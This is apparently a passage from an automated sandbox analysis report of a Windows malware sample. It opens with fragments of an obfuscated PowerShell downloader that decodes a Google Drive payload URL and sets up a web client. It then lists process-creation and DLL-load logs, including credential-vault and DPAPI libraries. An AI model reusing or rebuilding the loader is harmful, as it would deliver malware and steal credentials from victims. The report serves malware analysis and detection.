ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe" Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
